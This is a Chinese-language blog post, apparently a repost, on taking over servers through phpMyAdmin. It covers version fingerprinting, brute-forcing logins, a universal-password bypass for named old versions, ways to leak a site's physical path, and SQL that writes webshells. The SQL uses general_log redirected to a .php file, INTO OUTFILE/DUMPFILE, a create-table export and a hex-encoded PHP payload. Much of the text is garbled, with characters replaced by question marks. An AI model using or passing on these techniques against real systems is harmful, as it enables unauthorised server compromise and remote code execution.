PHPMyadmin拿shell

标签：rop   site   code   就会   admin   特殊字符   备份   pass   lib   

基于PHPMyadmin的攻击

找到页面后，先判断版本：

登录框查看
也可以直接访问：/doc/html/index.html目录

口令爆破: burp等

远程代码执?等漏洞

后台bypass【万能密码】
phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码，直接使?‘localhost’@‘@”为账号，密码不?输?。
phpmyadmin2.11.9.2 这个版本存在空口令。直接root??登陆，密码不?

GETSHELL（方法很多很多）

物理路径获取

报错?站代码问题报错 :?般就是加 ‘ 等特殊字符

解析器（Web容器、中间件）报错 如 IIS7.5:?般就是加?些不存在的?录名字

Google爆路径 结合关键字和site语法搜索出错

??快照，常?关键字有warning和fatal error。注意，如果?标站点 是?级域名，site接的是其对应的顶级域名，这样得到的信息要多得多。
Site:xxx.edu.tw warning Site:xxx.com.tw "atal error"

根据正常的安装?件猜 ?如phpstudy的默认?站?录是：c:/phpStudy/phpstudy/PHPTutorial/WWW/

读取解析器的配置?件
正常情况我们是?法得知解析器的配置?件的，这个时候就是尝试解析器默认的安装路径。
取巧假设某种情况下，我们得知?标是?的phpstudy，可是不是在默认的路径，我们就可以读取路径 select @basedir ，
得到路径后，推测?站路径。

旁站报错 你的?标是不报错的，但是不代表你的?标?站的邻居不报错啊。?如?标站是 www.target.com ，
它的邻居 是：www.victim.com ，邻居?站有注?，加 ‘ 后爆出它的?站某个??路径是：c:/wwwroot/victim/news.asp ，
那 你根据这个推荐你的?标站点的路径就有可能是 c:/wwwroot/target/ 。

其他信息phpinfo??

?站源码备份 ……

通过?志拿shell

原理，phpmyadmin有?个记录?志的?件，但是?般情况下会关闭，开启?志记录，然后设置?志记录名称为.php，
随便执? sql语句，只要包括?句话木?就会被写?到?志中去，然后就可以连接getshell。

set global general_log=‘on‘ //?先设置为on 
set global general_log_file ="E:\\wamp\\wamp\\www\\3.php" 
#执??条带有?句话??代码的SQL语句，
如： select ‘;

导出拿shell

正常导出拿shell

1. SELECT "" INTO OUTFILE "E:\wamp\wamp\www\2.php"
2. SELECT "" INTO dumpFILE "E:\wamp\wamp\www\2.php"

创建表导出shell
CREATE TABLE a (cmd text NOT NULL);
INSERT INTO a (cmd) VALUES(‘‘);
select cmd from a into outfile ‘D:/phpMyAdmin/libraries/d.php‘;
DROP TABLE IF EXISTS a;

猥琐型导出

select * from admin where userid=1 into outfile "x:\wwwroot\sx.php" LINES STARTING BY 0x3C3F70687020706870696E666F28293F3E%23

写完语句，要?hackbar的urlencode编码?下，不然很??率是不成功的哟。这个可以在基于MySQL的报错注?中 写webshell。

0x3C3F70687020706870696E666F28293F3E=

PHPMyadmin拿shell

标签：rop   site   code   就会   admin   特殊字符   备份   pass   lib   

原文地址：https://www.cnblogs.com/kwjqsj/p/13089700.html